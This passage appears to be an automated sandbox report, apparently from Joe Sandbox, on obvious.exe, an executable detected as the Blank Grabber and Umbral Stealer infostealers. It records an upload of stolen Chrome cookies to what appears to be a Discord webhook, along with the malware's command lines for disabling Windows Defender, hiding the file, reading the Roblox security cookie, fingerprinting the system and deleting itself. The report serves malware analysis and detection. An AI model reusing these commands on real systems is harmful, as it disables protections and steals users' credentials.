                            2024-08-27 18:06:03 UTC | 16355 | OUT | Data Ascii: PKpY{#Browsers\Cookies\Chrome Cookies.txtWK])#nE/xm~oZ<5o3$Rn,:u9_}=sb{ $@HBn29x<Sw]E'E3[,d'.iP,t6_Xw2n>Y+sgKqnl
                            2024-08-27 18:06:04 UTC | 1369 | IN | HTTP/1.1 200 OK
                            Date: Tue, 27 Aug 2024 18:06:04 GMT
                            Content-Type: application/json
                            Transfer-Encoding: chunked
                            Connection: close
                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                            x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                            x-ratelimit-limit: 5
                            x-ratelimit-remaining: 4
                            x-ratelimit-reset: 1724781965
                            x-ratelimit-reset-after: 1
                            vary: Accept-Encoding
                            via: 1.1 google
                            alt-svc: h3=":443"; ma=86400
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z1JxDf3CRtnntajpoa%2BmIv8u2DFdHLsoie8ptxNIInFMBlz5B%2BEOHhljNq8iApoMo2imSeHUUdj3eHnWnsbo9eizTr5SdT5oea78vJqMq7d5UIQ%2BukA%2FHBdhcxju"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            X-Content-Type-Options: nosniff
                            Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                            Server: cloudflare
                            CF-RAY: 8b9dfe46e9a443fa-EWR
                            40b
                            {"type":0,"content":"","mentions":[],"mention_roles":[],"attachments":[{"id":"1278052932096491550","filename":"Umbral-927537.zip","size":674274,"url":"https://cdn.discordapp.com/attachments/1176050474064019486/1278052932096491550/Umbral-927537.zip?ex=66cf670c&is=66ce158c&hm=ce5863cb3a6025b377a65f0bb5b3685c21506ae254be1afb38e1bcbbaf1ecdc1&","proxy_url":"https://media.discordapp.net/attachments/1176050474064019486/12780529320964


                            Target ID:0
                            Start time:14:05:00
                            Start date:27/08/2024
                            Path:C:\Users\user\Desktop\obvious.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Users\user\Desktop\obvious.exe"
                            Imagebase:0x12f5f5a0000
                            File size:235'008 bytes
                            MD5 hash:EABE2A81AA3DABAB25E49EE4B36CE075
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000000.1680331080.0000012F5F5A2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: 00000000.00000000.1680331080.0000012F5F5A2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000002.2327380876.0000012F6169F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000002.2327380876.0000012F61605000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:true

                            Target ID:1
                            Start time:14:05:02
                            Start date:27/08/2024
                            Path:C:\Windows\System32\wbem\WMIC.exe
                            Wow64 process (32bit):false
                            Commandline:"wmic.exe" csproduct get uuid
                            Imagebase:0x7ff678770000
                            File size:576'000 bytes
                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            Target ID:2
                            Start time:14:05:02
                            Start date:27/08/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:3
                            Start time:14:05:04
                            Start date:27/08/2024
                            Path:C:\Windows\System32\attrib.exe
                            Wow64 process (32bit):false
                            Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\obvious.exe"
                            Imagebase:0x7ff67c530000
                            File size:23'040 bytes
                            MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            Target ID:4
                            Start time:14:05:04
                            Start date:27/08/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:5
                            Start time:14:05:04
                            Start date:27/08/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\obvious.exe'
                            Imagebase:0x7ff788560000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:6
                            Start time:14:05:04
                            Start date:27/08/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:7
                            Start time:14:05:07
                            Start date:27/08/2024
                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                            Imagebase:0x7ff693ab0000
                            File size:496'640 bytes
                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                            Has elevated privileges:true
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:8
                            Start time:14:05:11
                            Start date:27/08/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                            Imagebase:0x7ff788560000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:9
                            Start time:14:05:11
                            Start date:27/08/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:10
                            Start time:14:05:13
                            Start date:27/08/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                            Imagebase:0x7ff788560000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:11
                            Start time:14:05:13
                            Start date:27/08/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:15
                            Start time:14:05:23
                            Start date:27/08/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                            Imagebase:0x7ff788560000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:16
                            Start time:14:05:23
                            Start date:27/08/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:17
                            Start time:14:05:37
                            Start date:27/08/2024
                            Path:C:\Windows\System32\wbem\WMIC.exe
                            Wow64 process (32bit):false
                            Commandline:"wmic.exe" os get Caption
                            Imagebase:0x7ff678770000
                            File size:576'000 bytes
                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:18
                            Start time:14:05:37
                            Start date:27/08/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:19
                            Start time:14:05:38
                            Start date:27/08/2024
                            Path:C:\Windows\System32\wbem\WMIC.exe
                            Wow64 process (32bit):false
                            Commandline:"wmic.exe" computersystem get totalphysicalmemory
                            Imagebase:0x7ff678770000
                            File size:576'000 bytes
                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:20
                            Start time:14:05:38
                            Start date:27/08/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:21
                            Start time:14:05:39
                            Start date:27/08/2024
                            Path:C:\Windows\System32\wbem\WMIC.exe
                            Wow64 process (32bit):false
                            Commandline:"wmic.exe" csproduct get uuid
                            Imagebase:0x7ff678770000
                            File size:576'000 bytes
                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:22
                            Start time:14:05:39
                            Start date:27/08/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:23
                            Start time:14:05:39
                            Start date:27/08/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                            Imagebase:0x7ff788560000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:24
                            Start time:14:05:39
                            Start date:27/08/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:26
                            Start time:14:05:58
                            Start date:27/08/2024
                            Path:C:\Windows\System32\wbem\WMIC.exe
                            Wow64 process (32bit):false
                            Commandline:"wmic" path win32_VideoController get name
                            Imagebase:0x7ff678770000
                            File size:576'000 bytes
                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:27
                            Start time:14:05:59
                            Start date:27/08/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:28
                            Start time:14:06:04
                            Start date:27/08/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\obvious.exe" && pause
                            Imagebase:0x7ff6b1070000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:29
                            Start time:14:06:05
                            Start date:27/08/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:30
                            Start time:14:06:06
                            Start date:27/08/2024
                            Path:C:\Windows\System32\PING.EXE
                            Wow64 process (32bit):false
                            Commandline:ping localhost
                            Imagebase:0x7ff67c890000
                            File size:22'528 bytes
                            MD5 hash:2F46799D79D22AC72C241EC0322B011D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true


                              Execution Graph

                              Execution Coverage:17.4%
                              Dynamic/Decrypted Code Coverage:100%
                              Signature Coverage:100%
                              Total number of Nodes:3
                              Total number of Limit Nodes:0

                              Control-flow Graph

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2382261650.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bc90000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: @\"q$@\"q$H\"q$H\"q$H\"q$P\"q$P\"q$P\"q$X\"q$X\"q$X\"q$`\"q$`\"q$`\"q$h\"q$h\"q$h\"q$p\"q$p\"q$p\"q$x\"q$x\"q$x\"q$f/q
                              • API String ID: 0-1930805683
                              • Opcode ID: f766547b9759139ef1c288c3c558268220ea87d77b9f970e78ba23bb44eeeec7
                              • Instruction ID: d4e33d9d4f46d256ac6d718e966f8a90b40767c971094052bf853e83d533ef26
                              • Opcode Fuzzy Hash: f766547b9759139ef1c288c3c558268220ea87d77b9f970e78ba23bb44eeeec7
                              • Instruction Fuzzy Hash: 60B22971B0EA8A4FD769DB78846A5B87BD1FF55321B0541FED049CB1E2ED296C02C740

                              Control-flow Graph

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2382261650.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bc90000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: @\"q$@\"q$P\"q$P\"q$P\"q$X\"q$X\"q$X\"q$`\"q$`\"q$`\"q$h\"q$h\"q$h\"q$p\"q$p\"q$x\"q$x\"q$x\"q
                              • API String ID: 0-1243318442
                              • Opcode ID: 0d5d641f875a3a3d09890d5dd0846c7fd659104f6b51d6e462949745cdda8203
                              • Instruction ID: 4ff2c22ce9c7a5e7c089e50b40d79115f5c2c681103abd15918a5de82f33f6ed
                              • Opcode Fuzzy Hash: 0d5d641f875a3a3d09890d5dd0846c7fd659104f6b51d6e462949745cdda8203
                              • Instruction Fuzzy Hash: 5A021472B0EA8A4FD76C9B7C546A2B877D1EFA932170541FED049CB2E2ED295C42C341

                              Control-flow Graph

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2382261650.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bc90000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: (g/q$0g/q$8g/q$@g/q$Hg/q$Pg/q
                              • API String ID: 0-3411227121
                              • Opcode ID: 4b65960f271e86ae94b613aa4f5af53543e27bb56a2b159864f5ee20f14e0d6c
                              • Instruction ID: 2f44b9bfa58b972b930f29e38304a0c8ad8d73fe11ae615be9a497c002fbd43f
                              • Opcode Fuzzy Hash: 4b65960f271e86ae94b613aa4f5af53543e27bb56a2b159864f5ee20f14e0d6c
                              • Instruction Fuzzy Hash: 4EA27330609A4E8FDB98EF68C865AA973E1FF58314F5106B8D41EC7296CF75E942CB40

                              Control-flow Graph

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: 8`"q$8`"q$@`"q$@`"q$H`"q$H`"q
                              • API String ID: 0-4259246571
                              • Opcode ID: ad5dea4d42ea0fd763de3f25ccd2875efa752a919bce95526f35d0e11db388e4
                              • Instruction ID: fafaaca09189ba71f49b41ee0cbcb18a3fba35123c9b869c684457f818bdcee1
                              • Opcode Fuzzy Hash: ad5dea4d42ea0fd763de3f25ccd2875efa752a919bce95526f35d0e11db388e4
                              • Instruction Fuzzy Hash: 11F1D631A09A4E8FDB98DF6884A56B977E1FF98310B1541BDD40EC72E2DE79AC42C740
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2382261650.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bc90000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: b/q$b/q
                              • API String ID: 0-595216909
                              • Opcode ID: 5e6acb7748671b7ca49e819b5faea0955ce8d33953adbb6561e00331f4cf894f
                              • Instruction ID: 469e8c0f26549a5097144f01895d7f08b473d25a5117cc3a4e4b32a1f86e767b
                              • Opcode Fuzzy Hash: 5e6acb7748671b7ca49e819b5faea0955ce8d33953adbb6561e00331f4cf894f
                              • Instruction Fuzzy Hash: 0C733871A1E7CA4FE3398B7484656A97BE0EF46304F0545BEC48E8B1A7DE386907C742
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2382261650.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bc90000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: 8f/q$8f/q$H
                              • API String ID: 0-4181802071
                              • Opcode ID: 51e1c44dca0dd1d542a59fda2a8adef1f8e7779780272c44a0c7d5c7aa997845
                              • Instruction ID: 6a990d79864aeb2b8e664e8b4f0219a1667166e47d827ece372c6a03fea3d498
                              • Opcode Fuzzy Hash: 51e1c44dca0dd1d542a59fda2a8adef1f8e7779780272c44a0c7d5c7aa997845
                              • Instruction Fuzzy Hash: B6E1D231F1EA1D4FEBA8EB7888656BC77D1EF58750F060179E44EC32A2DE28AD418741
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: ;L
                              • API String ID: 0-2817095199
                              • Opcode ID: 1b65b33bdb4adc7fab874297fc6fdaf2c7c13fcb8bb4e2d7ee425ccd34dea9cd
                              • Instruction ID: 3e8cdb030e1a41bdaeb18c172558618e93c12cf1557514ecf76ddc59fa51ab15
                              • Opcode Fuzzy Hash: 1b65b33bdb4adc7fab874297fc6fdaf2c7c13fcb8bb4e2d7ee425ccd34dea9cd
                              • Instruction Fuzzy Hash: F6E25C7061DB898FD7B8DF18C4A9AAA73E1FF98304F11457DD48DC72A1DA34A942CB42
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2382261650.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bc90000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: d/q$e/q
                              • API String ID: 0-3536358171
                              • Opcode ID: 80830761f1db36cbc82208822cc600c8ada126b0439c8444face24eeb9ff1d24
                              • Instruction ID: 7cb46dad63378d1bc0a34539f28273fe42c093b255805b394c6c51ca20651751
                              • Opcode Fuzzy Hash: 80830761f1db36cbc82208822cc600c8ada126b0439c8444face24eeb9ff1d24
                              • Instruction Fuzzy Hash: FD123830A0AA4E4FEBA4DF7888616ED77E1FF59310F1502B9D019D71EACE39A906C741
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: PH_H
                              • API String ID: 0-3521414399
                              • Opcode ID: c59d8bddf42837317e7b4098add9d270154ac1d325bbde5481f3ef810974187d
                              • Instruction ID: c514c541c746f1b99df8db404d388ae6c3101cb506ec98fcf26344e9af7e1dce
                              • Opcode Fuzzy Hash: c59d8bddf42837317e7b4098add9d270154ac1d325bbde5481f3ef810974187d
                              • Instruction Fuzzy Hash: BA420171B19A0D4FEBA8DA58806967573D2FFA8348F1501BDD09EC72E2DE29ED02C741
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2382261650.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bc90000_obvious.jbxd
                              Similarity
                              • API ID: CryptDataUnprotect
                              • String ID:
                              • API String ID: 834300711-0
                              • Opcode ID: 64053d59d5d9152cfef823ebbfd4726e6324cee86cb2c649f9bf383378fc2663
                              • Instruction ID: 3b329e6c815886e867dde68878dfd7d7d3714e48df6847c5e2e4309d28e21de2
                              • Opcode Fuzzy Hash: 64053d59d5d9152cfef823ebbfd4726e6324cee86cb2c649f9bf383378fc2663
                              • Instruction Fuzzy Hash: FE31A33191CA4C8FDB58DF5CD846AA9B7E0FBA8321F00422FE449D3652DB74A8558BC2
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 595f23e5acabae37b9acbbf7bbc36bd164b017fcb4236ee32c413a5aaab78bc6
                              • Instruction ID: 0abe51a01aa732dfa04f812695b9c0d636618d42c3f9427c5624e8966bfe21ca
                              • Opcode Fuzzy Hash: 595f23e5acabae37b9acbbf7bbc36bd164b017fcb4236ee32c413a5aaab78bc6
                              • Instruction Fuzzy Hash: 6862093070DA8E8FDB65EBB48866AEA7BE1FF85310F5506BDE019C71D7C9689802C741
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 842dfba95d5b58c9a4e86b48098804eaee318323dec9f178ef14bf41449bbd3e
                              • Instruction ID: 6365fd1cd86527f73d34dc0dc1aac36105b6e20f3c50479004adb7967a55fac5
                              • Opcode Fuzzy Hash: 842dfba95d5b58c9a4e86b48098804eaee318323dec9f178ef14bf41449bbd3e
                              • Instruction Fuzzy Hash: 7732D430B1EA4D4FEBA4EB5C8864A7977E1FF98354F0501B9E48DC72EADE24E9418740
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: fafb302dd00f2afbd5a95a76e832b6ba63c499e270c8a22dee7d698c10637bfa
                              • Instruction ID: 4aa2089c3284b3b6a06c138cdab5d50949ae4d2ef19e9413a8384b71b1c69158
                              • Opcode Fuzzy Hash: fafb302dd00f2afbd5a95a76e832b6ba63c499e270c8a22dee7d698c10637bfa
                              • Instruction Fuzzy Hash: 5A424030A19A098FEBA8DB58C4A5BA973E1FF68304F1141BDD45EC72E5DE34E981CB41
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ce32407a2fef10c49a47950101b4b498cff47377702876bbec3abf37e3105171
                              • Instruction ID: 795156705774da237443d30508551ff97ed6f7421807d841fa76623aebd8ef25
                              • Opcode Fuzzy Hash: ce32407a2fef10c49a47950101b4b498cff47377702876bbec3abf37e3105171
                              • Instruction Fuzzy Hash: 7132C232718A0A4FDBA8DA19C4A1AB5B3E2FFA8318B11456DD05EC75D6CE35FD42C780
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2eb51689ebd737010812ec8a7be1b8e67f0d76742b00ef388722751ec0eb8f37
                              • Instruction ID: 2ac1afd867c6f04a16837c8b827b67718eb1292a1a4848ab670531fa62c69da5
                              • Opcode Fuzzy Hash: 2eb51689ebd737010812ec8a7be1b8e67f0d76742b00ef388722751ec0eb8f37
                              • Instruction Fuzzy Hash: 64124231B1DB4E4FE368DE5C84965B673D1FB95324B10467EE08AC32E6EE25F8428781
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a4db2d4a7ceba9a6cc0deff826897012eb2a3f6012097e56a9850522171831ed
                              • Instruction ID: 7cda5a93bff05e6f57067acf1277dd4333a912bebeec45a873de1a70422d6485
                              • Opcode Fuzzy Hash: a4db2d4a7ceba9a6cc0deff826897012eb2a3f6012097e56a9850522171831ed
                              • Instruction Fuzzy Hash: 71121871B09A4E8FDBA8DF6894656B973E1FF98320B1141BED409C72E6DE75AC02C740
                              Memory Dump Source
